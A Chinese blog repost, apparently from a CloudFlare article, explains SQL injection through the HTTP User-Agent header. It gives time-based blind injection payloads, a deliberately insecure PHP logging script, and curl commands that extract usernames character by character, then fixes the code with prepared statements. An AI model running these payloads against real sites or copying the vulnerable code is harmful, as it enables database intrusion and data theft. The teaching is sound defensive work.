User Agent注入攻击及防御

CloudFlare公司经常会收到客户询问为什么他们的一些请求会被 CloudFlare WAF 屏蔽。最近,一位客户就提出他不能理解为什么一个访问他主页简单的 GET 请求会被 WAF 屏蔽。


下面是被屏蔽的请求:


GET / HTTP/1.1


Host: www.example.com


Connection: keep-alive


Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8


Upgrade-Insecure-Requests: 1


User-Agent: Mozilla/5.0 (compatible; MSIE 11.0; Windows NT 6.1; Win64; x64; Trident/5.0)'+(select*from(select(sleep(20)))a)+'


Accept-Encoding: gzip, deflate, sdch


Accept-Language: en-US,en;q=0.8,fr;q=0.6


正如他说的,一个简单的请求访问 WEB 主页,乍看之下好像没什么问题。除非你仔细查看 User-Agent 部分:


Mozilla/5.0 (compatible; MSIE 11.0; Windows NT 6.1; Win64; x64; Trident/5.0)'+(select*from(select(sleep(20)))a)+


User-Agent 前半部分看起来挺正常的(好像是微软 IE 11),但是却以字符串 '+(select*from(select(sleep(20)))a)+ 结尾。攻击者试图对 User-Agent 值进行 SQL 注入。


普通的 SQL 注入通常是对 URL 及其参数进行的,但这里攻击者却将 SQL 查询语句 select * from (select(sleep(20))) 隐藏在了 HTTP 头部的 User-Agent 字段之中 。这种技术通常被各种扫描器所使用,例如,sqlmap 的 -p 参数会尝试对 HTTP 请求头部字段进行注入。


延时注入


许多 SQL 注入都是在尝试从网站中提取信息(例如用户名、密码或其他隐私信息)。但这条语句却不太一样,它请求数据库进程等待 20 秒。这种攻击属于 SQL 盲注,一般的 SQL 注入会将查询的结果返回到 WEB 页面中,而盲注的攻击者则看不到查询的输出,所以他们会另辟蹊径使用其他的方式来判断注入。两种常见的方法就是使 WEB 服务器产生错误或者产生延时。如上使用 sleep 会是 WEB 服务器等待 20 秒才进行响应,攻击者可以根据响应是否产生延时来判断是否存在注入漏洞。


示例


为了更好的说明,我使用 PHP 创建了一个不安全的应用,其中会将 User-Agent 保存到 MySQL 数据库中。这类代码可能会存在于真实的应用中用来分析信息,例如统计访问次数。


在这个示例中,我忽略了所有良好安全的编码习惯,因为我想阐述下 SQL 的工作原理。


再次警告:千万不要复制/粘贴以下代码!因为这些代码并不规范。


下面是 PHP 代码:


$link = new mysqli('localhost', 'insecure', '1ns3cur3p4ssw0rd', 'analytics');


$query = sprintf("INSERT INTO visits (ua, dt) VALUES ('%s', '%s')",


$_SERVER["HTTP_USER_AGENT"],


date("Y-m-d h:i:s"));


$link->query($query);


?>


Thanks for visiting


这段代码会连接到本地的 analytics 数据库,并将访客 HTTP 头部的 User-Agent 字段不加过滤的插入到数据库中。


这就是一个 SQL 注入的例子,但是因为我们的代码不会产生任何错误,所以攻击者无法通过报错来得知是否存在注入漏洞,除非他们使用类似 sleep() 之类的方法。


为了验证是否存在注入漏洞,只需要执行如下命令(其中 insecure.php 就是上述示例代码):


curl -A "Mozilla/5.0', (select*from(select(sleep(20)))a)) #" http://example.com/insecure.php


这样就会将 HTTP 头部的 User-Agent 字段设置为 Mozilla/5.0', (select*from(select(sleep(20)))a)) #。而我们不安全的 PHP 代码会不加过滤就直接将这些字符串插入查询语句中,此时的查询语句变成了如下样子:


INSERT INTO visits (ua, dt) VALUES ('Mozilla/5.0', (select*from(select(sleep(20)))a)) #', '2016-05-17 03:16:06')


本来应该插入两个值,但现在只会插入一个值 Mozilla/5.0 并执行 (select*from(select(sleep(20)))a) 语句(这会使数据库休眠 20 秒)。而 # 是注释符,意味着后续的语句被注释并忽略了(就是忽略了插入日期)。


此时的数据库中会出现这样一个条目:


+---------------------+---------------+


| dt | ua |


+---------------------+---------------+


| 0 | Mozilla/5.0 |


+---------------------+---------------+


请注意,其中日期值为 0,这正是 (select*from(select(sleep(20)))a) 语句执行的结果,另外 ua 的值为 Mozilla/5.0,而这可能就是攻击者成功执行 SQL 注入后留下的唯一痕迹了。


下面是接收到上述请求后服务器的运行结果,我们使用 time 命令来看看这个过程到底需要多长时间:


$ time curl -v -A "Mozilla/5.0', (select*from(select(sleep(20)))a) #" http://example.com/insecure.php


* Connected to example.com port 80 (#0)


> GET /insecure.php HTTP/1.1


> Host: example.com


> User-Agent: Mozilla/5.0', (select*from(select(sleep(20)))a) #


> Accept: */*


>


Date: Mon, 16 May 2016 10:45:05 GMT


Content-Type: text/html


Transfer-Encoding: chunked


Connection: keep-alive


Server: nginx


html>head>head>body>b>Thanks for visitingb>body>html>


* Connection #0 to host example.com left intact


real 0m20.614s


user 0m0.007s


sys 0m0.012s


看到 20 秒了吗,成功的执行了 SQL 注入。


漏洞利用


看到这,你也许会想“这的确很简单,但是黑客好像并没有攻击我的网站啊”。


但不幸的是,丰富的 SQL 语句使得哪怕是只有 3 行 PHP 代码的 insecure.php,也可以使得攻击者获得远不只使数据库睡眠 20 秒的效果。虽然攻击者执行的 INSERT INTO 的查询只会向数据库中写入数据,但这样仍然可以让他们提取出敏感信息和获取访问权限。


为了一个演示的例子,我们在数据库中创建了一个名为 user 的表,其中包含两个用户分别名为 root 和 john。下面来展示攻击者是如何发现存在 john 用户的,他们可以手工构造用户名并根据相应时间来判断是否存在这个用户。


例如:


curl -A "Mozilla/5.0', (select sleep(20) from users where substring(name,1,1)='a')) #" http://example.com/insecure.php


这个访问会被立即响应,因为数据库中并没有以 a 打头的用户名,但是


curl -A "Mozilla/5.0', (select sleep(20) from users where substring(name,1,1)='j')) #" http://example.com/insecure.php


这个请求却会花费 20 秒时间。这样在猜出用户名的首字母后,攻击者就可以继续猜测用户名第二个、第三个字母等等,相同的技术还可以用来从数据库中提取其他数据。


如果我们的应用比较复杂,例如是一个博客的评论系统,那么我们可以利用这个漏洞将数据库的一些信息转存到一条评论中,这样我们就可以通过访问网页直接查看到数据库信息了,这种方法通常会在需要提取大量数据时使用。


代码加固


加固代码最好的方式就是像如下这样:


$link = new mysqli('localhost', 'analytics_user', 'aSecurePassword', 'analytics_db');


$stmt = $link->prepare("INSERT INTO visits (ua, dt) VALUES (?, ?)");


$stmt->bind_param("ss", $_SERVER["HTTP_USER_AGENT"], date("Y-m-d h:i:s"));


$stmt->execute();


?>


Thanks for visiting


首先将 SQL 查询语句使用 prepare 进行准备,随后使用 bind_param 绑定两个参数(User-Agent 和日期),最后才是使用 execute 执行查询。


bind_param 可以确保一些 SQL 特殊字符会先被进行转义,随后才被执行。现在让我们来看一看在收到跟之前一样的 SQL 注入后数据库中的条目是什么样子的:


+---------------------+----------------------------------------------------+


| dt | ua |


+---------------------+----------------------------------------------------+


| 2016-05-17 04:46:02 | Mozilla/5.0',(select*from(select(sleep(20)))a)) # |


+---------------------+----------------------------------------------------+


此时,攻击者的 SQL 语句没有被执行而是被简单的存入了数据库当中。


总结


SQL 注入是攻击者最喜欢使用的攻击方式之一,它可能出任何由攻击者掌控输入的 WEB 应用中。最容易想象的就是出现在各种表单或 URL 之中,但即使是 HTTP 请求头部也同样可能出现。所以从安全角度来说,任何由 WEB 浏览器发送给 WEB 应用的数据都应当被假设为是恶意的。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 204,445评论 6 478
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 85,889评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 151,047评论 0 337
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,760评论 1 276
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,745评论 5 367
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,638评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,011评论 3 398
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,669评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,923评论 1 299
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,655评论 2 321
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,740评论 1 330
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,406评论 4 320
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,995评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,961评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,197评论 1 260
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 45,023评论 2 350
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,483评论 2 342

推荐阅读更多精彩内容